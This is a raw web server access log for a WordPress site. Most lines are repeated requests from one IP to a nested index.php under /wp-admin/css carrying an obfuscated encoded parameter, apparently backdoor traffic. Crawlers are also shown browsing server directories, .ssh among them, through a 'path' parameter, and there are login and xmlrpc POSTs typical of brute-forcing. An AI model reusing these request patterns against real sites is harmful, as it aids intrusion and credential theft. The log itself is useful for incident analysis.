142.4.205.1 - - [16/Oct/2025:18:50:17 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383631372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353031372q3636666334666165373234333661393639643466386139356637353165333661222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.196 - - [16/Oct/2025:18:51:33 -0400] "GET /?_g=23549 HTTP/1.0" 200 24520 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [16/Oct/2025:18:50:37 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383633372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353033372q3462303465643766363336363166383561343635623762643230366161383337222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.152.60 - - [16/Oct/2025:18:51:50 -0400] "GET /author/auditwpmedia/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks/buttons HTTP/1.0" 200 7327 "https://academiedumarketing.com/author/auditwpmedia/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [16/Oct/2025:18:50:57 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383635372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353035372q3431336133646236313466393436343637623961396464636265646330326230222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:18:51:17 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383637372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353037372q6664653765626165633162353933353163353964613932646439333735653461222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:18:51:37 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383639372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353039372q3134663861303339393433383936653036323634373238386561303462316564222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:18:51:57 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383731372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353131372q3637333930373130336262663537633464633230363932376530663463336634222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.128.196 - - [16/Oct/2025:18:53:13 -0400] "GET /author/auditwpmedia/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/SimplePie/library/SimplePie/Content HTTP/1.0" 200 7126 "https://academiedumarketing.com/author/auditwpmedia/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/SimplePie/library/SimplePie" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [16/Oct/2025:18:52:17 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383733372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353133372q6164636239633165343565323530393031653333663464613863343364626533222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:18:52:37 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383735372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353135372q3939373430666635363237666635653339616462646363333763663231323239222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
57.141.0.41 - - [16/Oct/2025:18:53:36 -0400] "GET /?path=/ HTTP/1.0" 200 16731 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
66.249.65.195 - - [16/Oct/2025:18:53:53 -0400] "GET /market/48354323.htm HTTP/1.0" 200 24656 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [16/Oct/2025:18:52:57 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383737372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353137372q3038656264643065326138396437326463386138333031613265633131346263222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.196 - - [16/Oct/2025:18:54:07 -0400] "GET /market/48521992.htm HTTP/1.0" 200 24731 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.195 - - [16/Oct/2025:18:54:12 -0400] "GET /market/46505856.htm HTTP/1.0" 200 24457 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [16/Oct/2025:18:53:17 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383739372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353139372q3564656262393464633165383233356233646631633832303837306337386633222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.195 - - [16/Oct/2025:18:54:25 -0400] "GET /feature/akihabara_main/index.html HTTP/1.0" 200 25583 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [16/Oct/2025:18:53:37 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383831372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353231372q3662366537363838643136653139383362333433373038353264333231333565222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.146.77 - - [16/Oct/2025:18:54:37 -0400] "GET /author/auditwpmedia/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/uploads/2021/04 HTTP/1.0" 200 6776 "https://academiedumarketing.com/author/auditwpmedia/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/uploads/2021" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [16/Oct/2025:18:53:57 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383833372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353233372q3836393735353937363362396531373334333064383236343131313439396137222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:18:54:17 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383835372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353235372q3038363065386536633834313865323962643761376639383063336535336264222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:18:54:37 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383837372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353237372q6566353938316366373265666337666531396265356163353763313739616530222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.196 - - [16/Oct/2025:18:55:52 -0400] "GET /market/51565854.htm HTTP/1.0" 200 24566 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [16/Oct/2025:18:54:57 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383839372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353239372q6462396636643562656330623566356430396434343837316636346136333636222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.129.33 - - [16/Oct/2025:18:56:00 -0400] "GET /author/auditwpmedia/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/plugins/wp-file-manager/inc HTTP/1.0" 200 7417 "https://academiedumarketing.com/author/auditwpmedia/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/plugins/wp-file-manager" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
195.20.233.67 - - [16/Oct/2025:18:56:07 -0400] "GET /wp-login.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36"
195.20.233.67 - - [16/Oct/2025:18:56:08 -0400] "POST /wp-login.php HTTP/1.0" 200 9227 "https://academiedumarketing.com/wp-login.php" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36"
142.4.205.1 - - [16/Oct/2025:18:55:17 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383931372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353331372q6633653066356438653134663465363038363733656531336530306464643432222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:18:55:37 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383933372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353333372q3963373239393632343833663466656637346131353864353537313230343935222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:18:55:57 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383935372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353335372q3164366433303063373938386532656536346538623839393331313862363836222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.197 - - [16/Oct/2025:18:57:06 -0400] "GET /30 HTTP/1.0" 200 24400 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [16/Oct/2025:18:56:17 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383937372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353337372q3131333739336430366131313439303565343961363737656230326539353336222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.131.235 - - [16/Oct/2025:18:57:26 -0400] "GET /2025/10/?path=/var/www/vhosts/academiedumarketing.com/public_html/brYIQEH/brYIQEH/brYIQEH HTTP/1.0" 200 7303 "https://academiedumarketing.com/2025/10/?path=/var/www/vhosts/academiedumarketing.com/public_html/brYIQEH/brYIQEH" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [16/Oct/2025:18:56:37 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383939372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353339372q3530636137366265666434616437346536643335303232636132396463373263222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:18:56:57 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393031372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353431372q3766363334373431656439363232653730373138633762313637363961616163222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
178.33.43.96 - - [16/Oct/2025:18:58:12 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
142.4.205.1 - - [16/Oct/2025:18:57:17 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393033372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353433372q6336353762366132343662373339333366653234643338653332666635356135222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
178.33.43.96 - - [16/Oct/2025:18:58:26 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
178.33.43.96 - - [16/Oct/2025:18:58:36 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
142.4.205.1 - - [16/Oct/2025:18:57:37 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393035372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353435372q3165653231306263616437313735383031333331333664396131626365303337222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.146.77 - - [16/Oct/2025:18:58:48 -0400] "GET /2025/10/?path=/var/www/vhosts/academiedumarketing.com/.ssh HTTP/1.0" 200 7007 "https://academiedumarketing.com/2025/10/?path=/var/www/vhosts/academiedumarketing.com" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [16/Oct/2025:18:57:57 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393037372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353437372q3763353463333635356663343165316263393831326665643362313864363537222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
